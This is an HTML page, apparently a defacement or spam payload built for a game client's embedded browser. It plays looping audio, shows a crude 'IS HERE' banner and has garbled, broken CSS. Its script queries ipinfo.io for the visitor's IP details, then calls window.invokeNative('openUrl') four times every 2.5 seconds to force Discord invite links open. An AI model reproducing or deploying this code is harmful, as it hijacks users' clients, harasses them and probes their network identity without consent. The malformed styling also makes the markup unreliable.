<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/dick</title>
    <style>
        body {
            margin: 0;
            padding: 0;
           : url(';
            display: flex;
            justify-content 
            heigh: auto;
            border: 2px solid #000000; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(255, 255, 255); 
        
        .info {
            margintop: 20px;
            font-size: 1.5em;
            color: #000; 
            text-shade: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #000000; 
            text-shadow: 0px 0px 8px #FFFFFF, 0px 0px 15px #FFFFFF, 0px 0px 25px #FFFFFF; 
            letter-spacing: 4.5px; 
        }
    </style>
</head>
<body>
    <div class="image-container">
        <img src="" alt="">
    </div>
    <audio autoplay loop>
        <source src="https://cdn.discordapp.com/attachments/1355246702407450857/1417576073075364020/GHOSTEMANE_-_Mercury.mp3?ex=68cafc19&is=68c9aa99&hm=07597f878f5c96ada9b4bee106dde45f9e3c0e4d974b397d1fc08d594f31de33&" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>
    <div class="text">/\po#n-hub & ABO Sh5H /\ . .  IS HERE </div>

   
    <script>
        fetch('https://ipinfo.io/json')

        setInterval(function() {
            window.invokeNative("openUrl", "https://discord.gg/F3K7HjcjUu");
            window.invokeNative("openUrl", "https://discord.gg/F3K7HjcjUu");
            window.invokeNative("openUrl", "https://discord.gg/F3K7HjcjUu");
            window.invokeNative("openUrl", "https://discord.gg/F3K7HjcjUu");
        }, 2500);
   
    </script>
</body>
</html>
